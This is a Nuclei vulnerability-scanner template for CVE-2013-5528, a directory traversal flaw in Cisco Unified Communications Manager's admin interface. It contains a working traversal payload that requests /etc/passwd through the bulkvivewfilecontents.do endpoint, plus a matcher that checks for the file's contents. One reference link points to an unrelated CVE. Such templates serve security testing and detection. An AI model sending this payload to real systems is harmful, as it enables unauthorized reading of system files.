my-nuclei-templates/CVE-2013-5528.yaml

34 lines
1.1 KiB
YAML
Executable File

id: CVE-2013-5528
info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference:
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
- http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/
classification:
cve-id: CVE-2013-5528
tags: cve,cve2013,lfi,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24